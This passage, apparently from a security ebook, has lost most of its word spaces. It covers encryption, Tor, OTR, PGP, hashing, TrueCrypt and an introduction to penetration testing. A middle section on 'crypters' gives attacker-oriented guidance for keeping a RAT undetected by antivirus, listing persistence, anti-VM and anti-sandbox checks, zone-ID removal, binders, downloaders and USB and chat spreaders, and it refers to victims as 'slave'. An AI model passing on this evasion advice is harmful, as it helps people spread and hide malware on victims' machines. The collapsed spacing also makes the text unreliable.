Anymessage(text,binaryfiles,ordocuments)thatareencryptedbyusingthepublickey can only be decrypted by applying the same algorithm, but by using thematchingprivatekey.Anymessage that is encryptedbyusing theprivatekey canonlybedecryptedbyusingthematchingpublickey.
ThismeansthatyoudonothavetoworryaboutpassingpublickeysovertheInternet(thekeysaresupposedtobepublic).Aproblemwithasymmetricencryption,however,isthatitisslowerthansymmetricencryption.Itrequiresfarmoreprocessingpowertobothencryptanddecryptthecontentofthemessage.
SecureCommunicationsEqualsBetterPrivacy
“Encryptionworks.Properlyimplementedstrongcryptosystemsareoneofthefewthingsthatyoucanrelyon.Unfortunately,endpoint security is so terrificallyweakthatNSAcan frequently findways around it.” -EdwardSnowden,answeringquestionsliveontheGuardian’swebsite
TheNSAisthebiggest,bestfundedspyagencytheworldhaseverseen.Theyspendbillionsuponbillionsofdollarseachyeardoingeverything theycan tovacuumupthe digital communications ofmost humans on this planet that have access to theInternetandandthephonenetwork.AndastherecentreportsintheGuardianandWashingtonPostshow,evendomesticAmericancommunicationsarenotsafe fromtheirnet.
DefendingyourselfagainsttheNSA,oranyothergovernmentintelligenceagency,isnot simple, and it’snot something that canbe solved justbydownloadinganapp.But thanks to thededicatedworkofciviliancryptographersandthe freeandopensourcesoftwarecommunity,it’sstillpossibletohaveprivacyontheInternet,andthesoftware to do it is freely available to everyone. This is especially important forjournalistscommunicatingwithsourcesonline.
“Wediscoveredsomething.Ouronehopeagainsttotaldomination.Ahopethatwithcourage,insightandsolidaritywecouldusetoresist.Astrangepropertyofthephysicaluniversethatwelivein.Theuniversebelievesinencryption.
Itiseasiertoencryptinformationthanitistodecryptit.”-JulianAssange
When Snowden uses the term “endpoint security” he means the security of thecomputersoneitherendof theconversation thataredoing theencryptingand thedecrypting,asopposedtothesecurityofthemessagewhenit’sintransit.Ifyousendanencrypted email to a friend but you have a keylogger on your computer that’slogging the entire message, as well as the passphrase that’s protecting yourencryptionkeys,yourencryptionisn’tworthverymuch.
Proprietary software, such as much of what’s released by Microsoft, Apple, andGoogle,hasanotherflaw.It’smuchmoredifficultforuserstoindependentlyverifythatsecretbackdoorsdon’texistattheclandestinedemandsofthesurveillancestate.Though recent reports have shown that many companies hand over an unknownamountofinformationinresponsetoFISArequests,nonehavebeenshowntohave
directbackdoorsintotheirsystems.
There is other software that’s more reliable in this regard. Free and open sourcesoftware is not alwaysuser friendly and it’s not always secure.Howeverwhen it’sdeveloped in the open,with open bug trackers, openmailing lists, open governingstructures,andopensourcecode,it’smuchmoredifficultfortheseprojectstohaveapolicyofbetrayingtheiruserslikeMicrosofthas.
It’simportanttorememberthatjustbecauseyouusefreesoftwaredoesn’tmeanyoucan’t get hacked. People find zero day exploits for free software all the time, andsometimes sell them to governments and other malicious attackers. Free softwareusers still downloadmaliciousattachments in their email, and they still oftenhavebadlyconfiguredandeasilyexploitedservicesontheircomputers.Andevenworse,malware isoftenverygoodathiding.Ifa freesoftwareusergetsmalwareontheircomputer,itmightstaythereuntiltheuserformatstheirharddrive.
Tails,whichisaliveDVDandliveUSBGNU/LinuxdistributionthatIwilldiscussindetailbelow,solvesmanyoftheseproblems.
AnonymizeYourLocationwithTor
TorisasoftwareservicethatallowsyoutousetheInternetwhileconcealingyourIPaddress,whichis,ingeneral,afairlyaccuraterepresentationofyourlocation.TheTornetworkismadeupofover3,600volunteerserverscallednodes.WhensomeoneusestheTornetworktovisitawebsitetheirconnectiongetsbouncedthroughthreeofthesenodes(calledacircuit)beforefinallyexitingintothenormalInternet.Anyoneinterceptingtrafficwillthinkyourlocationisthefinalnodewhichyourtrafficexitsfrom.
It’simportanttorememberthatjustbecauseyourconnectiontotheInternetmaybeanonymousthatdoesn’tmagicallymakeitsecure.EFFhasmadeagreatvisualizationofhowTorandHTTPScanworktogethertoprotectyourprivacy.
Likeallgoodcryptographicsoftware,Torisfreesoftware,completewithanopenbugtracker,mailinglists,andsourcecode.
Westilldon’tknowwhetherornotNSAorGCHQcountsasaglobaladversary,but
wedoknowthattheymonitoralargeportionoftheInternet.It’stooearlytoknowforsurehowoftentheseintelligenceagenciescandefeattheanonymityoftheTornetwork.
Eveniftheycan,usingTorstillgivesusmanyadvantages.Itmakestheirjobmuchharder,andweleavemuchlessidentifyingdataontheserversweconnecttothroughtheTornetwork.ItmakesitmuchhardertobethevictimofaMITMattackatourlocalnetworkorISPlevel.AndevenifsomeTorcircuitscanbedefeatedbyaglobaladversary,ifenoughpeoplearegettingtheirtrafficroutedthroughthesameTornodesatthesametime,itmightbedifficultfortheadversarytotellwhichtrafficbelongstowhichcircuits.
TheeasiestwaytostartusingToristodownloadandinstalltheTorBrowserBundle.
Off-the-Record(OTR)Chat
Off-the-Record (OTR) is a layer of encryption that can be added to any existinginstantmessagechatsystem,providedthatyoucanconnecttothatchatsystemusingachatclientthatsupportsOTR,suchasPidginorAdium.WithOTRit’spossibletohavesecure,end-to-endencryptedconversationsoverserviceslikeGoogleTalkandFacebookchatwithoutGoogleorFacebookeverhavingaccesstothecontentsoftheconversations. Note: this is different than the “off-the-record” option in Google,which is not secure. And remember: while Google and Facebook’s HTTPSconnectionisveryvaluableforprotectionagainstyourmessagewhileit’sintransit,they still have the keys to your conversations so they can hand them over toauthorities.
OTR is used for two things: encrypting the contents of real-time instant messageconversations and verifying the identity of people that you chat with. Identityverification isextremely importantandsomethingthatmanyOTRusersneglect todo.WhileOTRismuchmoreuserfriendlythatotherformsofpublickeyencryption,if youwish to use it securely you still need to understand how itworks andwhatattacksagainstitarepossible.
Using OTR only encrypts the contents of your chat conversations but not themetadatarelatedtothem.Thismetadataincludeswhoyoutalktoandwhenandhowoftenyoutalktothem.ForthisreasonIrecommendusingaservicethatisn’tknownto collaboratewith intelligence agencies.While thiswon’t necessarily protect yourmetadataatleastyouhaveachanceofkeepingitprivate.
I also recommend you use an XMPP (also known as Jabber) service. Like email,Jabber is a federated, openprotocol.Users of riseup.net‘s Jabber service can chatwithusersofjabber.ccc.de‘sserviceaswellasjabber.org‘sservice.
TouseOTRyou’llneedtodownloadsoftware.IfyouuseWindowsyoucandownloadandinstallPidgin and separately theOTRplugin. If you useGNU/Linux you caninstallthepidginandpidgin-otrpackages.Youcanreadthroughdocumentationonhow to set up your Pidgin accounts with OTR. If you use Mac OS X you candownloadandinstallAdium,whichisafreesoftwarechatclientthatincludesOTRsupport. You can read the official documentation on how to get set upwithOTRencryptionwithAdium.
WhenyoustartusingOTR,yourchatclientgeneratesanencryptionkeyandstoresit in a file in your user’s home folder on your hard drive. If your computer orsmartphonegetlost,stolen,orinfectedwithmalware,it’spossiblethatyourOTRkeycan get compromised. If this happens, it would be possible for an attacker withcontrol over your Jabber server to be able tomount aMITM attack against youwhileyou’rechattingwithpeoplewhohavepreviouslyverifiedyouridentity.
“PrettyGoodPrivacy”(PGP)EmailEncryption
In1991,PhilZimmermanndevelopedemailencryptionsoftwarecalledPrettyGoodPrivacy, or PGP, which he intended peace activists to use while organizing in theanti-nuclearmovement.
Today,PGPisacompanythatsellsaproprietaryencryptionprogrambythesamename.OpenPGPis theopenprotocol thatdefineshowPGPencryptionworks,andGnuPG (GPG for short) is free software, and is 100% compatible with theproprietaryversion.GPGismuchmorepopularthanPGPtodaybecauseit’sfreeforeveryonetodownload,andcypherpunkstrustitmorebecauseit’sopensource.ThetermsPGPandGPGareoftenusedinterchangeably.
AswithOTR,eachpersonwhowishes to sendorreceiveencryptedemailneedstogeneratetheirownPGPkey,calledakeypair.PGPkeypairsaresplitintotwoparts,thepublickeyandthesecretkey.
Ifyouhavesomeone’spublickey,youcandotwothings:encryptmessagesthatcan
only be decryptedwith their secret key, and verify signatures thatwere generatedwith their secretkey. It’s safe togiveyourpublickey toanyonewhowants it.Theworstanyonecandowithitisencryptthemessagesthatonlyyoucandecrypt.
Withyoursecretkeyyoucandotwothings:decryptmessagesthatwereencryptedusingyourpublickey,anddigitallysignmessages.It’simportanttokeepyoursecretkeysecret.Anattackerwithyoursecretkeycandecryptmessagesintendedonlyforyou,andhecanforgemessagesonyourbehalf.Secretkeysaregenerallyencryptedwithapassphrase,soevenifyourcomputergetscompromisedandyoursecretkeygets stolen, the attackerwould need to get your passphrase before hewould haveaccesstoit.UnlikeOTR,PGPdoesnothaveforwardsecrecy.IfyourPGPsecretkeyis compromisedand theattackerhas copiesofanyhistorical encryptedemailsyouhavereceived,hecangobackandretro-activelydecryptthemall.
Sinceyouneedotherpeople’spublickeysinordertoencryptmessagestothem,PGPsoftwareletsyoumanageakeyringwithyoursecretkey,yourpublickey,andallofthepublickeysofthepeopleyoucommunicatewith.
UsingPGPforemailencryptioncanbeveryinconvenient.Forexample,ifyousetupPGP on your computer but have received an encrypted email on your phone, youwon’tbeabletodecryptittoreadtheemailuntilyougettoyourcomputer.
Passphrases
Thesecurityofcryptooftenreliesonthesecurityofapassword.Sincepasswordsarevery easily guessed by computers, cryptographers prefer the term passphrase toencourageuserstomaketheirpasswordsverylongandsecure.
ComiccourtesyXKCD
For tips on choosing good passphrases, read the passphrase section of EFF’sDefending Privacy at the U.S. Border: A Guide for Travelers Carrying DigitalDeviceswhitepaper,andalsotheDicewarePassphraseHomePage.
InadditiontoprotectingPGPsecretkeys,youalsoneedtochoosegoodpassphrasesfordiskencryptionandpasswordvaults.
CryptographicHashFunction
Thefundamentaldifferencebetweenhashandencryptiontechniquesisthathashisirreversiblewhileencryptionisreversible.
Hashalgorithmsgenerateadigestoffixedlengthoutputciphertextforagiveninputplain text. The output text cannot be converted back to input text. The generatedoutputwillalwaysbesameforagiveninputplaintextthatishashedusinganyoneofthe hashing algorithms(MD5, SHA etc), nomatter howmany times the process isrepeated.
Encryption technique employs secretkeys to encryptplain text and convert it intociphertextbutdifferentfromhashingmechanismsincethisprocessisreversiblei.e,the ciphertext can be decrypted back to plain text using the secret key. However,there are variations in encryption algorithms in the way the keys are used. 1)Symmetric encryption algorithms(like AES, DES, RC2 etc) use the same key forencryptionanddecryptionpurposes2)Asymmetricalgorithms(likeRSA,DSAetc)usepublicandprivatekeypairstoencrypt&decryptplaintext
Cryptographichashfunctionshavemanyinformationsecurityapplications,notablyin digital signatures, message authentication codes (MACs), and other forms ofauthentication.They canalsobeusedas ordinaryhash functions, to indexdata inhashtables,forfingerprinting,todetectduplicatedataoruniquelyidentifyfiles,andas checksums to detect accidental data corruption. Indeed, in information securitycontexts, cryptographic hash values are sometimes called (digital) fingerprints,checksums,orjusthashvalues,eventhoughallthesetermsstandformoregeneralfunctionswithratherdifferentpropertiesandpurposes.
FilesEncryptionandDecryption
ShouldIencryptmyfiles?Firstofall,ashortanswer:yes.Thingscangetstolenevenifyoudon’tshareyourcomputer.Allsomeoneneedsisafewminutesinfrontofthekeyboardtoretrieveanythingtheywant.Aloginpasswordwon’tprotectyou,either.
Soshouldyouencryptyoursensitivefiles?Yes.Butit’sabitmoretoitthanthat.Youhavetwobigchoiceswhenitcomestoencryption:doyoujustencrypttheimportantstuff,ordoyouencryptyourentiredrive?Eachhasprosandcons:
●Encryptingaselectgroupoffiles—liketheonesthatcontainpersonalinformation—keepsthemsafewithoutanyextracomplications.However,ifsomeonehadaccesstoyourcomputer,theycouldstillbreakintoitandviewanynon-encryptedfiles,accessyourbrowser,installmalware,andsoon.
●Encryptingyourentiredrivemakesitdifficultforanyonetoaccessanyofyourdataorevenbootupyourcomputerwithoutyourpassword.However,ifyouexperienceanycorruptiononyourdrive,it’smuchlesslikelythatyou’llbeabletoretrievethatdata.
I generally recommend against average users encrypting their entire drive.Unlessyouhavesensitivefilesalloveryourcomputer,orhaveotherreasonsforencryptingthe entire thing, it’s easier to encrypt the sensitive files and call it aday.Full diskencryptionismoresecure,butcanalsomuchmoreproblematic ifyoudon’tput inthework to keep everythingbackedup safely (and then encrypt thosebackups aswell).
Thatsaid,we’llshowyouhowtodobothinthisguide.andwhatyoudoisuptoyou.We’lltalkabitmoreabouteachsituationintheirindividualsectionsbelow.
HowtoEncryptIndividualFilesorFolderswithTrueCrypt
Ifyouneedtokeepafewfilessafefrompryingeyes,youcanencryptthemwiththefree,open-source,cross-platformTrueCrypt.ThesestepsshouldworkonWindows,OSX,andLinux.
TrueCrypt is no longer in active development though, but you should be able tofollowthesesameinstructionswithitsmoreup-to-datesuccessor,VeraCrypt.
CreatingaTrueCryptvolumeforyourfilesisinsanelyeasy—justfollowTrueCrypt’sstep-by-stepwizard.Here’sanoverviewofwhatitentails:
1. StartTrueCryptandclicktheCreateVolumebutton.
2. Onthefirstscreenof thewizard,select“Createanencryptedfilecontainer.”
3. Onthenextscreen,choose“StandardTrueCryptVolume.”Ifyouwanttocreateahiddenvolume(tofurtherobscureyourdata),readmoreabouthowitworkshere.Wewon’tcoveritinthistutorial.
4. On theVolumeLocation screen, click the Select File button andnavigatetothefolderinwhichyouwanttostoreyourencryptedfiles.Donotselectanexistingfileasthiswilldeleteit—instead,navigatetothe folder, type the desired name of your encrypted volume in the“FileName”box, and clickSave.We’ll add files to thisTrueCryptvolumelater.
5. Chooseyourencryptionalgorithmonthenextscreen.AESshouldbefineformostusers,thoughyoucanreadupontheotheroptionsifyou so chose.Remember: Some optionsmight bemore secure, butslowerthanothers.
6.Choosethesizeofyourvolume.Makesureithasenoughspacetofitallyourfiles,andanyfilesyoumaywanttoaddtoitlater.
7. Chooseapassword toprotectyour files.Remember, the strongeryourpassword,thesaferyourfileswillbe.Makesureyourememberyourpassword,becauseifyouloseit,yourdatawillbeinaccessible.
8. Onthenext screen, followthe instructionsandmoveyourmousearoundrandomlyforabit.ThiswillensureTrueCrypt’sgeneratesastrong,randomkey.ThenclickNexttocontinuewiththewizard.
9. Choosea filesystem foryourencryptedvolume. If you’re storingfilesover4GB inside,you’llneed tochooseNTFS.ClickFormat tocreatethevolume.
Tomount your volume, open up TrueCrypt and click the “Select File”button.Navigate to the file you just created.Then, select anopendriveletter from the list and click theMount button. Type in your passwordwhen prompted, andwhen you’re done, your encrypted volume shouldshowupinWindowsExplorer,asifitwereaseparatedrive.Youcandragfilestoit,movethemaround,ordeletethemjustlikeyouwouldanyotherfolder.Whenyou’redoneworkingwithit,justheadbackintoTrueCrypt,select it from the list, and clickDismount. Your files should stay safelyhiddenaway.
AlternativeTools
TrueCrypt has long been one of themost popular encryption tools outthere,andit’soneoftheeasiesttosetup.Itisn’ttheonlyoption,however.7-Zip is also a great way to encrypt your files, as is BitLocker, whichcomeswiththeProversionofWindows8(ortheEnterpriseandUltimateversionsofWindows7).
Term‘Crypter’(Encryptionsoftware)
Insomecircles,“crypter”and“packer”aresynonymoustomeanbinariesorprogramswhichareself-checkingand/orself-modifying.Cryptersmay,morespecifically,meanself-modificationthatincludesencryptionand/orcodescrambling(seemorebelow).
What’sthedifferencebetweenCrypterandaPacker?
A Crypter Encrypts your files and a Packer packs your files usually with theintentionofmakingitsmallerinsizeandsometimesforscantimeundetection.
DifferencebetweenScantimeandRuntimecrypters.
A file is scantime detected if before it’s ran the AV detects it, or when a scan isrunningthefileisfoundandmarkedasathreat.ScantimeDetectionsarecausedbyvisibleinstructionsorPEinfosuchasAssembly/Icon,ClonedCertificates,ResourcesTypeandSize,Instructionsandmore.ThatmeansthatEssentiallywhatRAT/Serveryour crypt will make little to no difference on scantime detections as the file isencryptedinanunrecognizableway.
AfileisRuntimeDetectedif,onlyafterthefileisran,ittriggerstheAVprogramtoblock, stop or delete the program in question. Runtime Detections are caused bybehaviour. Basically how your file acts and runs can prompt a runtime detection.TheRAT/ServeryourcryptWILLaffecttheRuntimeDetection.ToavoidRuntimeDetections, you should refrain fromusingoverused settings. i.e.Rootkitswillmostlikelypromptadetection.Yourbestbetistouseaslittleoptionsaspossiblefromtheserverandmorefromthecrypter.Why?Becauseitiseasytotargetthebehaviourofa widely used RAT, when it never really gets updated or changed. Crypters getupdatedandmodifiedsoitismorereliabletousetheirsettingstoavoiddetections.AwaytopreventsomeRuntimeDetectionsisalsotouseAntiMemoryScan,whichwillbasicallydenyaccesstothememoryspaceyourserverisrunningon.
HowdoIknowwhichAntivirusisdetectingmyfile?
Therearesomanysiteswiththissamepurposeofscanningfilesandgivingareportofwhichantivirusesdetectyour files.Themain issue leading tocryptersbecomingdetectedisbecauseifyouorsomeonewhoisinpossessionofyourcryptedfile,scansitonsomeofthesescannersites,thecryptedfilewillbedistributedtotheantivirusvendors,thuscausingthecryptedcodeoverwrittenonyourfiletobecomedetected,whichinturncausesyourcryptertoturnoutdetected.
TypesandFormsofCrypters.
CrypterscanrangeinmanytypesandformsanditisimportanttounderstandthesetypesandformsbecauseitwillhelpyouchooseaqualitycryptertosolveyourneedsorhelpyourealizewhatoptionsandfeaturesyouwouldwanttoimplementinyourownCrypter.Herearesomesimpleandadvancedcrypterstogiveyouagoodidea,orpictureinyourhead.
FindingCryptersandCryptersthemselvescanbeahugepain.IknowwhenIfirststarted out, I hated the fact that I just couldn’t find a FREE FUD CRYPTERanywhere.But Idon’t recommendusing free crypters as your filewill bedetectedwithinfewdaysormaybeaweekifyou’reluckyenough,that’swherepaidcryptersorprivatecrypterscomeinhandy.
CrypterFeatures&Description
● Startup/Installation:ModuleofthestubthataddsyourcryptedtothelistofprogramstorunwithWindowsatstart!Manydifferenttypes.UsingRegistry,Tasks,CopyingfiletoStartupFolder,etc.
● StartupPersistence:Modulethatwillconstantlychecksifyourfilehasbeenremovedfromthestartuplist.
● Process/Injection: PersistenceModule that will constantly checks if yourserverhasbeenkilled,ifithasstartitorinjectthepayloadagain.Againmanydifferent ways of achieving this i.e. Watchdog, DLL Injection and the listcontinues.
● Anti-MemoryScan:Module thatwilldenyaccess toanything that tries toreadthepayloadyouinjected.ExtremelyhelpfulagainstRuntimeDetections.
●ElevateProcess/Privileges:AttemptstogainAdminRightsforyourfile.
● CriticalProcess:Changes certain attributes of your running file thatwillcauseaBSOD(BlueScreenofDeath)iftheprocessisterminated.
●Mutex:Averyusefulfeaturetomakesureyourfileisnotrunningmorethanonceatthesametime.MostRATshavethisfeaturesonotessentialoncrypters.
●MeltFile:Removes/Deletesyourfileafteritissuccessfullyran.
● Extension Spoofer: Simple trick with a Unicode Character called“LeftToRight”.Doesn’tchange theactualextensionbutwillmake it look likesomethingelse.Ifyou’retryingtomakeitlooklikeapicture,didyouknowyoucanrenametheextensionfrom.exeto.scr(ScreenSaver)?
●FilePumper:Addasetnumberofbytes(withvalue0)totheendofyourfile,increasingitssizebutwithoutdisruptingtheanyproceduresonruntime.
●Compress:Decreasestheoutputsize.
● IconorAssemblyClone:CopiestheAssemblyInformationortheIconofachosenfile.(GoodtobypasssomeGenericdetections)
● Encryption Algorithm: Function used to transform the bytes of yourRAT/Serverintosomethingcompletelydifferent.Willessentiallymakelittletonodifferenceondetectionwhichalgorithmyouuse.
● DelayExecution:Used to “stop” or pause your file,while running, for acertain period of time. Adding 30+ seconds will in some cases help bypassruntimedetections,believeitornot.
●Binder:Addanotherfiletothestub,nowyourstubwillruntheRAT/Serverbut also the file you binded one after the other! (Means you can run a legit
programandyourRATatthesametime,winwin!)
● Downloader:Well that’s obvious,downloadsand runsa file fromagivenURL.
● USG–UniqueStubGenerator:Willmakesureyourstubisasdifferentaspossible from previous crypts. Cheap versions on USG will only renamevariablesandmethods–makingnotmuchdifferenceatall.
● FakeMessageBox:Amessageboxwillpopupwhenthefileisexecuted.Youcanchooseforittodisplaywhatevermessage.I’llletyoufigureoutwhythisisusefulwhenspreading.
● HideFile:Sets theoptionofyour file tobeHiddenso the infectedpersoncannot see your file in the folder. Victims can still see the files if the “ShowHiddenFileandFolders”optionontheircomputerison.
●Antis:Stopyourfilefromrunningifcertainprogramsarerunninginthebackground.MostcommonAntisare:AntiVirtualMachine(VMWare,VirtualBoxandVirtualPC)AntiSandboxieAntiWiresharkAntiFiddlerAntiDebuggerAntiAnubis
●Botkill:Searchesforanyexistingfilesorprocessesthatmightbemalwareandattemptstokill/removethemfromthesystem.
●Remove/ChangeZoneID:ZoneIDinformationrecordedonthefile,toletWindowsknowwhereitcamefrom.(InmostcasescausingtheSmartScreen,orthe“Areyousureyouwanttorunthisfile?”box)ThismodulewillremovetheZoneIDthefilewasgiven.Thedifferentvaluesare:0–LocalMachine1–Intranet2–Trusted3–Internet4–Untrusted
● Spreaders:Attemptstocopyyourfiletoplaceswhereitmightinfectotherusers.Mostspreadersdon’twork,sodon’tbefooled.Commonspreaders:USB–WillcopyyourfiletoanyUSBconnectedtothePC.Backinthedaytheywouldalsosetupanautorun.inifiletomaketheserverexecuteassoonastheUSBisconnectedtoanotherPC.AutorunnolongerworksonWindows.Rar/Zip – add your file to the files inside the compressed folder. Chat/IM(Skype,Facebook,Omegle,Twitter)–Messagesotherpeoplewithan infectedlinkorattemptstosendthemaninfectedfile.Lan–Doesn’twork,sonobother.
●JunkCode:Addsuseless,unnecessarylinesofcode/instructionsinanattempttobypass some less specificScantimeDetections.Somewhat efficientbut alsoincreasesthestubsize.
● RemoveVersionInfo:DeletesaresourcecalledVersionInfo,whichcontainsalltheassemblyinformation.HelpsgetridofKazygenericdetectionwhenallyouhavetriedhasfailed.
●RequireAdmin:PromptsanUACwindowaskingtheslavetorunthefileasAdmin.
● CertificateClone/Forger:AddsaCertificate toyourfilecopiedfromothersignedApplications,thecertificatewillbeinvalidbutmakesyourfilelookabitmorelegit.
ChapterSeven:IntroductiontoPenetrationTesting
WhatisPenetrationtest?
A penetration test, or sometimes pentest, is asoftwareattackonacomputersystemthatlooksfor security weaknesses, potentially gainingaccess to thecomputer’s featuresanddata.Theprocess typically identifies the target systemsand a particular goal—then reviews availableinformation and undertakes various means toattainthegoal.Apenetrationtesttargetmaybea white box (which provides background andsystem information) or black box (whichprovidesonlybasicornoinformationexceptthe
company name). A penetration test can help determine whether a system isvulnerabletoattack, ifthedefensesweresufficient,andwhichdefenses(ifany)thetestdefeated.
Security issues that thepenetration testuncovers shouldbereported to the systemowner.Penetrationtestreportsmayalsoassesspotentialimpactstotheorganizationandsuggestcountermeasurestoreducerisk.
Thegoalsofpenetrationtestsare:
1. Determinefeasibilityofaparticularsetofattackvectors.
2. Identify high-risk vulnerabilities from a combination of lower-riskvulnerabilitiesexploitedinaparticularsequence.
3. Identify vulnerabilities that may be difficult or impossible to detect withautomatednetworkorapplicationvulnerabilityscanningsoftware.
4. Assess the magnitude of potential business and operational impacts ofsuccessfulattacks.
5.Testtheabilityofnetworkdefenderstodetectandrespondtoattacks.
6. Provideevidencetosupportincreasedinvestmentsinsecuritypersonnelandtechnology.
History(PenetrationTesting)
Bythemid-1960s,growingpopularityof time-sharingcomputersystemsthatmaderesourcesaccessibleovercommunicationslinescreatednewsecurityconcerns.AsthescholarsDeborahRussell andG.T.Gangemi, Sr. explain, “The 1960smarked thetruebeginningoftheageofcomputersecurity.”InJune1965,forexample,severalofthe country’s leading computer security experts held one of the first majorconferences on system security—hosted by the government contractor, the SystemDevelopment Corporation (SDC). During the conference, someone noted that oneSDCemployeehadbeenabletoeasilyunderminevarioussystemsafeguardsaddedto SDC’sAN/FSQ-32 time-sharing computer system. In hopes that further systemsecurity studywould be useful, attendees requested “…studies to be conducted insuch areas as breaking security protection in the time-shared system.” In otherwords, the conference participants initiated one of the first formal requests to usecomputerpenetrationasatoolforstudyingsystemsecurity.
At theSpring1967JointComputerConference,many leadingcomputerspecialistsagainmettodiscusssystemsecurityconcerns.Duringthisconference,thecomputersecurity experts Willis Ware, Harold Petersen, and Rein Tern, all of the RANDCorporation,andBernardPetersoftheNationalSecurityAgency(NSA),allusedthephrase“penetration” todescribeanattackagainst a computer system. Inapaper,Ware referred to themilitary’s remotely accessible time-sharing systems, warningthat“Deliberateattemptstopenetratesuchcomputersystemsmustbeanticipated.”HiscolleaguesPetersenandTurnshared thesameconcerns,observing thaton-linecommunication systems “…are vulnerable to threats to privacy,” including“deliberatepenetration.”BernardPetersoftheNSAmadethesamepoint,insistingthatcomputerinputandoutput“…couldprovidelargeamountsofinformationtoapenetratingprogram.”Duringtheconference,computerpenetrationwouldbecomeformallyidentifiedasamajorthreattoonlinecomputersystems.
The threat that computer penetration posed was next outlined in a major reportorganized by the United States Department of Defense (DoD) in late 1967.Essentially,DoDofficials turned toWillisWare to leada taskforceofexperts fromNSA, CIA, DoD, academia, and industry to formally assess the security of time-sharingcomputersystems.ByrelyingonmanypaperspresentedduringtheSpring1967 Joint Computer Conference, the task force largely confirmed the threat tosystem security that computer penetration posed. Ware’s report was initiallyclassified,butmanyofthecountry’sleadingcomputerexpertsquicklyidentifiedthestudyasthedefinitivedocumentoncomputersecurity.JeffreyR.YostoftheCharlesBabbageInstitutehasmorerecentlydescribedtheWarereportas“…byfarthemost
importantandthoroughstudyontechnicalandoperational issuesregardingsecurecomputing systems of its time period.” In effect, the Ware report reaffirmed themajor threat posed by computer penetration to the new online time-sharingcomputersystems.
Tobetterunderstandsystemweaknesses,thefederalgovernmentanditscontractorssoonbeganorganizingteamsofpenetrators,knownastigerteams,tousecomputerpenetration to test system security.DeborahRussell andG.T.Gangemi,Sr. statedthat during the 1970s “…‘tiger teams’ first emerged on the computer scene.Tigerteamsweregovernmentandindustrysponsoredteamsofcrackerswhoattemptedtobreakdownthedefensesofcomputersystemsinanefforttouncover,andeventuallypatch,securityholes.”
Aleadingscholaronthehistoryofcomputersecurity,DonaldMacKenzie,similarlypoints out that, “RAND had done some penetration studies (experiments incircumventingcomputersecuritycontrols)ofearlytime-sharingsystemsonbehalfofthegovernment.”JeffreyR.YostoftheCharlesBabbageInstitute,inhisownworkon the history of computer security, also acknowledges that both the RANDCorporationand theSDChad“engaged in someof the first so-called ‘penetrationstudies’totrytoinfiltratetime-sharingsystemsinordertotesttheirvulnerability.”In virtually all these early studies, tiger teams successfully broke into all targetedcomputersystems,asthecountry’stime-sharingsystemshadpoordefenses.
Of early tiger team actions, efforts at the RAND Corporation demonstrated theusefulness of penetration as a tool for assessing system security. At the time, oneRANDanalystnotedthatthetestshad“…demonstratedthepracticalityofsystem-penetrationasa tool forevaluating theeffectivenessandadequacyof implementeddatasecuritysafeguards.”Inaddition,anumberoftheRANDanalystsinsistedthatthepenetration testexercisesallofferedseveralbenefits that justified itscontinueduse.Astheynotedinonepaper,“Apenetratorseemstodevelopadiabolicalframeofmind in his search for operating system weaknesses and incompleteness, which isdifficult to emulate.” For these reasons and others, many analysts at RANDrecommended thecontinuedstudyofpenetration techniques for theirusefulness inassessingsystemsecurity.
Perhaps the leadingcomputerpenetrationexpertduringthese formativeyearswasJamesP.Anderson,whohadworkedwith theNSA,RAND,andothergovernmentagencies to study system security. In early 1971, the U.S. Air Force contractedAnderson’sprivatecompany to study the securityof its time-sharingsystemat thePentagon. In his study, Anderson outlined a number ofmajor factors involved incomputerpenetration.Andersondescribedageneralattacksequenceinsteps:
1. Findanexploitablevulnerability.
2.Designanattackaroundit.
3.Testtheattack.
4.Seizealineinuse.
5.Entertheattack.
6.Exploittheentryforinformationrecovery.
MultiplePenetrationTestingTools
Nmap is a very versatile tool developed to scan addresses(IPV6 included), this tool allows the users to gather a massamount of information about the target quickly, informationincludingopenports,+much,muchmore.Nmapsupportsa
largenumberofscanningtechniquessuchas:UDP,TCPconnect(),TCPSYN(halfopen),ftpproxy(bounceattack),ICMP(pingsweep),FIN,ACKsweep,XmasTree,SYNsweep,IPProtocol,andNullscan.
Wireshark is a very powerful networktroubleshooting and analysis tool, Wiresharkprovidestheabilitytoviewdatafromalivenetwork,and supports hundreds of protocols and media
formats.
Cain and Abel is a revolutionary tool that providesmany functions that are able to do various passwordretrieval jobs, cracking passwords, sniffing networks,
androuting/analyzingprotocols.ThistoolisWindows-only,unlikemanyothertoolsthatexist,thisisapleasanttwisttomodernpenetrationtestingandforensictools.
MetaSploit, a very powerful network security andanalysis tool, used often for penetration attacks, thistool has a clean interface and easily gathers the
informationthatyouseek.
EttercapisasuiteformaninthemiddleattacksonLAN.It featuressniffingof liveconnections,content filtering on the fly and many other
interestingtricks. It supportsactiveandpassivedissectionofmanyprotocols (evencipheredones)andincludesmanyfeaturefornetworkandhostanalysis.(Takenfromtheirwebsite)
TheNessustoolprovideshigh-speeddatadiscovery,asset profiling, configuration auditing, andvulnerabilityanalysisofnetworks.
HowtoConductPenetrationTesting?
Penetration testing is not merely theserial execution of automated tools andgeneration of technical reports as it isfrequently viewed. It should provide aclear and concise direction on how tosecureanorganization’sinformationandinformation systems from real worldattacks.Onecriticalfactorinthesuccessof penetration testing is its underlyingmethodology.A systematic and scientificapproach should be used to successfullydocument a test and create reports thatare aimed at different levels ofmanagement within an organization. It
shouldnotberestrictivetoenablethetestertofullyexplorehisintuitions.
Generally, penetration testing has three phases: test preparation, test, and testanalysis as shown in Figure above. All the necessary documents for the test areorganized and finalized during the test preparation phase. The testers and theorganizationmeet to decide the scope, objectives, timing, and duration of the test.Issues such as information leakages and downtime are resolved and put into legalagreement document. Other legal agreements that are deemed necessary areconcludedandsignedduringthisphase.
Thebulkofthepenetrationtestingprocessisdoneduringthetestphase.Avarietyofautomated tools canbeused in thisphase.Thisphase involves the following steps:informationgathering,vulnerabilityanalysis,andvulnerabilityexploits.
Theinformationgatheringsteprequiresthatthetesterscanthephysicalandlogicalareas of the test target and identify all pertinent information needed in thevulnerabilityanalysisphase.Dependingontheinformationgatheredorprovidedbythe organization, the tester then analyzes the vulnerabilities that exist within thetarget’snetwork,hostandapplication.Thetestermayopttousethemanualmethodtodothisstepbutautomatedtoolsalsoexisttohelpthetester.Thelaststepallowsthe tester to find exploits for thevulnerabilities found in theprevious steps.Whenexploits do not lead to what is intended, for example, root access, then furtheranalysis should be done. This is represented by the loop between vulnerability
analysisandvulnerabilityexploitphases.
ChapterEight:DecompilingandReverseEngineering
